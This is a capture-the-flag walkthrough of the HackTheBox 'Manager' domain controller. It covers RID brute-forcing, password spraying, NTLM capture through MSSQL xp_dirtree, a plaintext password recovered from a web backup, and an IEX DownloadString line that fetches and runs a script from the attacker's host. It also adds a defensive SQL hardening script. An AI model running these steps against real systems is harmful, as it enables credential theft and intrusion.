SMB         10.129.144.138  445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.144.138  445    DC01             [+] manager.htb\guest: 

Oh, looks like guest works??? Let's brute-force the RIDs.

┌──(root㉿kali)-[~/work]
└─# crackmapexec smb 10.129.144.138 --pass-pol -u "guest" -p "" --rid-brute
SMB         10.129.144.138  445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.144.138  445    DC01             [+] manager.htb\guest: 
SMB         10.129.144.138  445    DC01             [+] Brute forcing RIDs
SMB         10.129.144.138  445    DC01             498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.144.138  445    DC01             500: MANAGER\Administrator (SidTypeUser)
SMB         10.129.144.138  445    DC01             501: MANAGER\Guest (SidTypeUser)
SMB         10.129.144.138  445    DC01             502: MANAGER\krbtgt (SidTypeUser)
SMB         10.129.144.138  445    DC01             512: MANAGER\Domain Admins (SidTypeGroup)
SMB         10.129.144.138  445    DC01             513: MANAGER\Domain Users (SidTypeGroup)
SMB         10.129.144.138  445    DC01             514: MANAGER\Domain Guests (SidTypeGroup)
SMB         10.129.144.138  445    DC01             515: MANAGER\Domain Computers (SidTypeGroup)
SMB         10.129.144.138  445    DC01             516: MANAGER\Domain Controllers (SidTypeGroup)
SMB         10.129.144.138  445    DC01             517: MANAGER\Cert Publishers (SidTypeAlias)
SMB         10.129.144.138  445    DC01             518: MANAGER\Schema Admins (SidTypeGroup)
SMB         10.129.144.138  445    DC01             519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB         10.129.144.138  445    DC01             520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.144.138  445    DC01             521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.144.138  445    DC01             522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.144.138  445    DC01             525: MANAGER\Protected Users (SidTypeGroup)
SMB         10.129.144.138  445    DC01             526: MANAGER\Key Admins (SidTypeGroup)
SMB         10.129.144.138  445    DC01             527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.144.138  445    DC01             553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.144.138  445    DC01             571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.144.138  445    DC01             572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.144.138  445    DC01             1000: MANAGER\DC01$ (SidTypeUser)
SMB         10.129.144.138  445    DC01             1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB         10.129.144.138  445    DC01             1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.144.138  445    DC01             1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB         10.129.144.138  445    DC01             1113: MANAGER\Zhong (SidTypeUser)
SMB         10.129.144.138  445    DC01             1114: MANAGER\Cheng (SidTypeUser)
SMB         10.129.144.138  445    DC01             1115: MANAGER\Ryan (SidTypeUser)
SMB         10.129.144.138  445    DC01             1116: MANAGER\Raven (SidTypeUser)
SMB         10.129.144.138  445    DC01             1117: MANAGER\JinWoo (SidTypeUser)
SMB         10.129.144.138  445    DC01             1118: MANAGER\ChinHae (SidTypeUser)
SMB         10.129.144.138  445    DC01             1119: MANAGER\Operator (SidTypeUser)

Damn... so guest really gets in. Do I enumerate passwords from this user list? Or try AS-REP Roasting? Well, I'm already using crackmapexec, so let me try each username as its own password.

user_list
zhong
cheng
ryan
raven
jinwoo
chinhae
operator
┌──(root㉿kali)-[~/work]
└─# crackmapexec smb 10.129.144.138 -u user_list -p user_list --no-brute
SMB         10.129.144.138  445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.129.144.138  445    DC01             [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE 
SMB         10.129.144.138  445    DC01             [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE 
SMB         10.129.144.138  445    DC01             [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE 
SMB         10.129.144.138  445    DC01             [-] manager.htb\raven:raven STATUS_LOGON_FAILURE 
SMB         10.129.144.138  445    DC01             [-] manager.htb\jinwoo:jinwoo STATUS_LOGON_FAILURE 
SMB         10.129.144.138  445    DC01             [-] manager.htb\chinhae:chinhae STATUS_LOGON_FAILURE 
SMB         10.129.144.138  445    DC01             [+] manager.htb\operator:operator 

Got a hit with operator! Let's see whether SMB works with this. Hope I can reach C$!

┌──(root㉿kali)-[~/work]
└─# smbmap -H 10.129.144.138 -u operator -p operator

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.129.144.138:445      Name: manager.htb               Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

No permissions, so SMB looks like a dead end. There was MSSQL, so how about that?

┌──(root㉿kali)-[~/work]
└─# impacket-mssqlclient manager.htb/operator:operator@10.129.144.138
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'operator'.

Rejected. What about Windows authentication?

┌──(root㉿kali)-[~/work]
└─# impacket-mssqlclient manager.htb/operator:operator@10.129.144.138 -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (MANAGER\Operator  guest@master)>

Got in!

Initial access

First, some enumeration.

SQL (MANAGER\Operator  guest@master)> select @@version;
                                                                                                                                                                                                                           
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
        Sep 24 2019 13:48:23 
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
   

SQL (MANAGER\Operator  guest@master)> select user_name();
        
-----   
guest   

SQL (MANAGER\Operator  guest@master)> SELECT name FROM master.dbo.sysdatabases;
name     
------   
master   

tempdb   

model    

msdb     

SQL (MANAGER\Operator  guest@master)> 

Hm. About what you'd expect.

xp_cmdshell

Let me check whether I can execute commands.

SQL (MANAGER\Operator  guest@master)> Use master
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
SQL (MANAGER\Operator  guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin');
    
-   
0   

SQL (MANAGER\Operator  guest@master)> EXEC sp_helprotect 'xp_cmdshell'
[-] ERROR(DC01\SQLEXPRESS): Line 291: There are no matching rows on which to report.

No luck.

NTLM capture

Start Responder.

┌──(root㉿kali)-[~/work]
└─# sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

Now access it over SMB.

SQL (MANAGER\Operator  guest@master)> xp_dirtree '\\10.10.14.23\relay'
[-] ERROR(DC01\SQLEXPRESS): Line 1: Incorrect syntax near '\'.
SQL (MANAGER\Operator  guest@master)> exec master.dbo.xp_dirtree '\\10.10.14.23\relay'
subdirectory   depth   
------------   -----   
SQL (MANAGER\Operator  guest@master)> 
[+] Listening for events...                                                                                                                                 

[SMB] NTLMv2-SSP Client   : 10.129.144.138
[SMB] NTLMv2-SSP Username : MANAGER\DC01$
[SMB] NTLMv2-SSP Hash     : DC01$::MANAGER:a3c1419ac9517cac…

Got an NTLM hash!!! (Hm? DC?? Not a service account?) Let's try cracking it!!!

┌──(root㉿kali)-[~/work]
└─# john --wordlist=./rockyou.txt hash
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)

No good. This one's not going to work.

xp_dirtree

If NTLM capture doesn't pan out, I'll just enumerate with xp_dirtree.
For the enumeration I want files listed as well as folders, so I used the options from the following site as a reference.

While trying the enumeration, it hit nicely at the web directory c:\inetpub\wwwroot.

SQL (MANAGER\Operator  guest@master)> exec master.dbo.xp_dirtree 'c:\inetpub\wwwroot' ,0,1;
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   

contact.html                          1      1   

css                                   1      0   

bootstrap.css                         2      1   

responsive.css                        2      1   

style.css                             2      1   

style.css.map                         2      1   

style.scss                            2      1   

images                                1      0   

about-img.png                         2      1   

body_bg.jpg                           2      1   

call-o.png                            2      1   

call.png                              2      1   

client.jpg                            2      1   

contact-img.jpg                       2      1   

envelope-o.png                        2      1   

envelope.png                          2      1   

hero-bg.jpg                           2      1   

location-o.png                        2      1   

location.png                          2      1   

logo.png                              2      1   

menu.png                              2      1   

next-white.png                        2      1   

next.png                              2      1   

offer-img.jpg                         2      1   

prev-white.png                        2      1   

prev.png                              2      1   

quote.png                             2      1   

s-1.png                               2      1   

s-2.png                               2      1   

s-3.png                               2      1   

s-4.png                               2      1   

search-icon.png                       2      1   

index.html                            1      1   

js                                    1      0   

bootstrap.js                          2      1   

jquery-3.4.1.min.js                   2      1   

service.html                          1      1   

web.config                            1      1   

website-backup-27-07-23-old.zip       1      1   

SQL (MANAGER\Operator  guest@master)> 

website-backup-27-07-23-old.zip looks interesting, so I'll access it through the web and download it.
Extracting and checking the contents, there are various files.
Let's check the .old-conf.xml file.

┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat .old-conf.xml                   
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>

A user and password are listed, so I'll try logging in with Evil-WinRM.
It worked! Got the user flag!
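Both xp_dirtree calls above (the UNC path that made DC01$ authenticate to Responder, and the wwwroot listing) work for a login that lands on the guest user because master grants EXECUTE on xp_dirtree to public by default, and guest cannot be disabled in master. The following audit and hardening script is an added example, not part of the writeup; it assumes a sysadmin connection to the DC01\SQLEXPRESS instance from the page.

```sql
-- Added audit/hardening example, not part of the original writeup.
-- Assumes a sysadmin connection to the DC01\SQLEXPRESS instance from the page.
USE master;
GO

-- 1. Which principals may execute the filesystem and command extended
--    procedures? On a default install xp_dirtree, xp_subdirs and
--    xp_fileexist are granted to public, which is why a login mapped to
--    the guest user could run them.
SELECT OBJECT_NAME(pe.major_id) AS procedure_name,
       pr.name                  AS grantee,
       pe.permission_name,
       pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.database_principals  AS pr
  ON pr.principal_id = pe.grantee_principal_id
WHERE pe.class = 1   -- object-level permissions
  AND pe.major_id IN (OBJECT_ID('dbo.xp_dirtree'),
                      OBJECT_ID('dbo.xp_subdirs'),
                      OBJECT_ID('dbo.xp_fileexist'),
                      OBJECT_ID('dbo.xp_cmdshell'))
ORDER BY procedure_name, grantee;
GO

-- 2. Which enabled, non-sysadmin logins have no user mapping in master and
--    therefore fall through to guest, as the page's "guest@master" prompt
--    shows? guest cannot be disabled in master, so the fix is the revoke below.
SELECT sp.name AS login_name, sp.type_desc
FROM sys.server_principals AS sp
LEFT JOIN sys.database_principals AS dp
  ON dp.sid = sp.sid
WHERE sp.type IN ('S', 'U', 'G')   -- SQL login, Windows login, Windows group
  AND sp.is_disabled = 0
  AND sp.name NOT LIKE '##%'
  AND ISNULL(IS_SRVROLEMEMBER('sysadmin', sp.name), 0) = 0
  AND dp.principal_id IS NULL;
GO

-- 3. Remove the default public grant so that only sysadmin (or principals
--    you grant explicitly) can trigger outbound SMB authentication or list
--    directories through the service account.
REVOKE EXECUTE ON OBJECT::dbo.xp_dirtree   FROM public;
REVOKE EXECUTE ON OBJECT::dbo.xp_subdirs   FROM public;
REVOKE EXECUTE ON OBJECT::dbo.xp_fileexist FROM public;
GO

-- 4. Verify: with the grant gone this reports "no matching rows",
--    the same answer the writeup got for xp_cmdshell.
EXEC sp_helprotect 'xp_dirtree';
GO
```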

Privilege escalation

Investigation

RustHound

I'll use RustHound as the BloodHound collector. If you've built it with Docker beforehand, there's no need to push an exe onto the target by hand; you get the zip file quickly, which is handy.

To build it, run the following command.
*Note: this takes a while.

┌──(root㉿kali)-[/opt/RustHound]
└─# docker build -t rusthound .
[+] Building 296.4s (11/11) FINISHED                                                                                                                        
 => [internal] load build definition from Dockerfile                                                                                                   0.1s
 => => transferring dockerfile: 368B                                                                                                                   0.0s
 => [internal] load .dockerignore                                                                                                                      0.1s
 => => transferring context: 2B                                                                                                                        0.0s
 => [internal] load metadata for docker.io/library/rust:1.64-slim-buster                                                                               2.9s
 => [1/6] FROM docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e                        18.7s
 => => resolve docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e                         0.0s
 => => sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0 194.36MB / 194.36MB                                                     7.7s
 => => sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 984B / 984B                                                             0.0s
 => => sha256:c761809aae5fe07769dab99f4404ca5d71a954934a74484e48eb06c0260ef484 742B / 742B                                                             0.0s
 => => sha256:085572de3c6eef7d59c5fe4feb8263dffa0425acb73747606391b2a8afec2446 4.85kB / 4.85kB                                                         0.0s
 => => sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b 27.14MB / 27.14MB                                                       1.3s
 => => extracting sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b                                                              3.2s
 => => extracting sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0                                                             10.7s
 => [internal] load build context                                                                                                                      0.1s
 => => transferring context: 532.71kB                                                                                                                  0.0s
 => [2/6] WORKDIR /usr/src/rusthound                                                                                                                   1.6s
 => [3/6] RUN apt-get -y update && apt-get -y install gcc libclang-dev clang libclang-dev libgssapi-krb5-2 libkrb5-dev libsasl2-modules-gssapi-mit m  28.6s
 => [4/6] COPY ./src/ ./src/                                                                                                                           0.1s
 => [5/6] COPY ./Cargo.toml ./Cargo.toml                                                                                                               0.1s 
 => [6/6] RUN cargo install --path .                                                                                                                 237.5s 
 => exporting to image                                                                                                                                 6.9s 
 => => exporting layers                                                                                                                                6.9s 
 => => writing image sha256:490ee8c18b28affff12ed0cb78992e21209368efd68a64772b027f2bf31f8bc8                                                           0.0s 
 => => naming to docker.io/library/rusthound  

Once the build is done, run RustHound via Docker.

┌──(root㉿kali)-[/opt/RustHound]
└─# docker run -v /opt/RustHound/work:/tmp/htb rusthound -d manager.htb -i 10.129.144.30 -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -o '/tmp/htb' -z --ldaps
---------------------------------------------------
Initializing RustHound at 13:47:28 on 10/24/23
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2023-10-24T13:47:28Z INFO  rusthound] Verbosity level: Info
[2023-10-24T13:47:29Z INFO  rusthound::ldap] Connected to MANAGER.HTB Active Directory!
[2023-10-24T13:47:29Z INFO  rusthound::ldap] Starting data collection...
[2023-10-24T13:47:31Z INFO  rusthound::ldap] All data collected for NamingContext DC=manager,DC=htb
[2023-10-24T13:47:31Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
[2023-10-24T13:47:31Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
[2023-10-24T13:47:31Z INFO  rusthound::json::checker] Starting checker to replace some values...
[2023-10-24T13:47:31Z INFO  rusthound::json::checker] Checking and replacing some values finished!
[2023-10-24T13:47:31Z INFO  rusthound::json::maker] 11 users parsed!
[2023-10-24T13:47:31Z INFO  rusthound::json::maker] 61 groups parsed!
[2023-10-24T13:47:31Z INFO  rusthound::json::maker] 1 computers parsed!
[2023-10-24T13:47:31Z INFO  rusthound::json::maker] 1 ous parsed!
[2023-10-24T13:47:31Z INFO  rusthound::json::maker] 1 domains parsed!
[2023-10-24T13:47:31Z INFO  rusthound::json::maker] 2 gpos parsed!
[2023-10-24T13:47:31Z INFO  rusthound::json::maker] 21 containers parsed!
[2023-10-24T13:47:31Z INFO  rusthound::json::maker] /tmp/htb/20231024134731_manager-htb_rusthound.zip created!

RustHound Enumeration Completed at 13:47:31 on 10/24/23! Happy Graphing!

Next, start neo4j and BloodHound.

┌──(root㉿kali)-[~]
└─# neo4j console      
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
2023-10-24 13:48:09.063+0000 INFO  Starting...
2023-10-24 13:48:10.303+0000 INFO  This instance is ServerId{943c822e} (943c822e-2b68-4657-8641-4e17a9052434)
2023-10-24 13:48:12.212+0000 INFO  ======== Neo4j 4.4.26 ========
2023-10-24 13:48:14.941+0000 INFO  Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-10-24 13:48:14.961+0000 INFO  Setting up initial user from defaults: neo4j
2023-10-24 13:48:14.962+0000 INFO  Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-10-24 13:48:14.986+0000 INFO  Setting version for 'security-users' to 3
2023-10-24 13:48:14.989+0000 INFO  After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-10-24 13:48:14.993+0000 INFO  Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-10-24 13:48:15.578+0000 INFO  Bolt enabled on localhost:7687.
2023-10-24 13:48:18.009+0000 WARN  The client is unauthorized due to authentication failure.
2023-10-24 13:48:18.263+0000 INFO  Remote interface available at http://localhost:7474/
2023-10-24 13:48:18.276+0000 INFO  id: 139452289A7629BDFCF98C634413FBAA52FD74408C9293012C8B5425A9878DF3
2023-10-24 13:48:18.276+0000 INFO  name: system
2023-10-24 13:48:18.277+0000 INFO  creationDate: 2023-10-24T13:48:13.182Z
2023-10-24 13:48:18.277+0000 INFO  Started.


┌──(root㉿kali)-[~]
└─# bloodhound
(node:7802) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron.  See https://github.com/electron/electron/issues/23506 for more information
(node:7900) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.

Nothing particularly notable.

winPeas

Download the winPEAS bat file from the link below and run it on the target host.

*Evil-WinRM* PS C:\Users\Raven\Documents> .\winPEASany.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD

               ((((((((((((((((((((((((((((((((                                                                                                             
        (((((((((((((((((((((((((((((((((((((((((((                                                                                                         
      ((((((((((((((**********/##########(((((((((((((                                                                                                      
    ((((((((((((********************/#######(((((((((((                                                                                                     
    ((((((((******************/@@@@@/****######((((((((((                                                                                                   
    ((((((********************@@@@@@@@@@/***,####((((((((((                                                                                                 
    (((((********************/@@@@@%@@@@/********##(((((((((                                                                                                
    (((############*********/%@@@@@@@@@/************((((((((                                                                                                
    ((##################(/******/@@@@@/***************((((((                                                                                                
    ((#########################(/**********************(((((                                                                                                
    ((##############################(/*****************(((((                                                                                                
    ((###################################(/************(((((                                                                                                
    ((#######################################(*********(((((                                                                                                
    ((#######(,.***.,(###################(..***.*******(((((                                                                                                
    ((#######*(#####((##################((######/(*****(((((                                                                                                
    ((###################(/***********(##############()(((((                                                                                                
    (((#####################/*******(################)((((((                                                                                                
    ((((############################################)((((((                                                                                                 
    (((((##########################################)(((((((                                                                                                 
    ((((((########################################)(((((((                                                                                                  
    ((((((((####################################)((((((((                                                                                                   
    (((((((((#################################)(((((((((                                                                                                    
        ((((((((((##########################)(((((((((                                                                                                      
              ((((((((((((((((((((((((((((((((((((((                                                                                                        
                 ((((((((((((((((((((((((((((((                                                                                                             

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission. '                                      
                                                                                                                                                            
  WinPEAS-ng by @hacktricks_live                                                                                                                            

       /---------------------------------------------------------------------------------\                                                                  
       |                             Do you like PEASS?                                  |                                                                  
       |---------------------------------------------------------------------------------|                                                                  
       |         Get the latest version    :     https://github.com/sponsors/carlospolop |                                                                  
       |         Follow on Twitter         :     @hacktricks_live                        |                                                                  
       |         Respect on HTB            :     SirBroccoli                             |                                                                  
       |---------------------------------------------------------------------------------|                                                                  
       |                                 Thank you!                                      |                                                                  
       \---------------------------------------------------------------------------------/                                                                  
                                                                                                                                                            
  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links


...(omitted)
ÉÍÍÍÍÍÍÍÍÍ͹ Current UDP Listening Ports
È Check for services restricted from the outside 
  Enumerating IPv4 connections
                                                                                                                                                            
  Protocol   Local Address         Local Port    Remote Address:Remote Port     Process ID        Process Name

  UDP        0.0.0.0               123           *:*                            1036              svchost
  UDP        0.0.0.0               389           *:*                            644               lsass
  UDP        0.0.0.0               5353          *:*                            1164              svchost
  UDP        0.0.0.0               5355          *:*                            1164              svchost
  UDP        10.129.144.138        88            *:*                            644               lsass
  UDP        10.129.144.138        137           *:*                            4                 System
  UDP        10.129.144.138        138           *:*                            4                 System
  UDP        10.129.144.138        464           *:*                            644               lsass
  UDP        127.0.0.1             52117         *:*                            1328              certsrv
  UDP        127.0.0.1             55064         *:*                            2224              Microsoft.ActiveDirectory.WebServices
  UDP        127.0.0.1             55068         *:*                            2612              dfsrs
  UDP        127.0.0.1             55071         *:*                            1456              svchost
  UDP        127.0.0.1             55269         *:*                            2836              ismserv
  UDP        127.0.0.1             57557         *:*                            644               lsass
  UDP        127.0.0.1             63083         *:*                            1416              svchost
  UDP        127.0.0.1             63229         *:*                            3988              WmiPrvSE

  Enumerating IPv6 connections
                                                                                                                                                            
  Protocol   Local Address                               Local Port    Remote Address:Remote Port     Process ID        Process Name

  UDP        [::]                                        123           *:*                            1036              svchost

╔══════════╣ Firewall Rules
╚ Showing only DENY rules (too many ALLOW rules always) 
    Current Profiles: DOMAIN
    FirewallEnabled (Domain):    True
    FirewallEnabled (Private):    True
    FirewallEnabled (Public):    True
    DENY rules:
  [X] Exception: Object reference not set to an instance of an object.

...(omitted)

certsrv... that has to be what I think it is, right???
Well, let me look at the rest too.

PrivescCheck

Grab the PowerShell script from the following repository.

*Evil-WinRM* PS C:\Users\Raven\Documents> IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.23/PrivescCheck.ps1'); Invoke-PrivescCheck
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0043 - Reconnaissance                           
 NAME      User identity                                     
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Get information about the current user (name, domain name)   
 and its access token (SID, integrity level, authentication   
 ID).                                                         
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Informational (1 finding)


Name             : MANAGER\Raven
SID              : S-1-5-21-4078382237-1492182817-2568127209-1116
IntegrityLevel   : Medium Plus Mandatory Level (S-1-16-8448)
SessionId        : 0
TokenId          : 00000000-01c8964c
AuthenticationId : 00000000-01c892f2
OriginId         : 00000000-00000000
ModifiedId       : 00000000-01c892f9
Source           : NtLmSsp (00000000-00000000)



┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0043 - Reconnaissance                           
 NAME      User groups                                       
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Get information about the groups the current user belongs to 
 (name, type, SID).                                           
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Informational (11 findings)

Name                                        Type           SID
----                                        ----           ---
MANAGER\Domain Users                        Group          S-1-5-21-4078382237-1492182817-2568127209-513
Everyone                                    WellKnownGroup S-1-1-0
BUILTIN\Remote Management Users             Alias          S-1-5-32-580
BUILTIN\Users                               Alias          S-1-5-32-545
BUILTIN\Pre-Windows 2000 Compatible Access  Alias          S-1-5-32-554
BUILTIN\Certificate Service DCOM Access     Alias          S-1-5-32-574
NT AUTHORITY\NETWORK                        WellKnownGroup S-1-5-2
NT AUTHORITY\Authenticated Users            WellKnownGroup S-1-5-11
NT AUTHORITY\This Organization              WellKnownGroup S-1-5-15
NT AUTHORITY\NTLM Authentication            WellKnownGroup S-1-5-64-10
Mandatory Label\Medium Plus Mandatory Level Label          S-1-16-8448


┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0004 - Privilege Escalation                     
 NAME      User privileges                                   
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Check whether the current user has privileges (e.g.,         
 SeImpersonatePrivilege) that can be leveraged for privilege  
 escalation to SYSTEM.                                        
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Nothing found
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0006 - Credential Access                        
 NAME      User environment variables                        
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Check whether any environment variables contain sensitive    
 information such as credentials or secrets. Note that this   
 check follows a keyword-based approach and thus might not be 
 completely reliable.                                         
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Nothing found
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
 CATEGORY  TA0004 - Privilege Escalation                     
 NAME      Non-default services                              
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
 Get information about third-party services. It does so by    
 parsing the target executable's metadata and checking        
 whether the publisher is Microsoft.                          
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Result: Informational (9 findings)


Name        : MSSQL$SQLEXPRESS
DisplayName : SQL Server (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
User        : NT Service\MSSQL$SQLEXPRESS
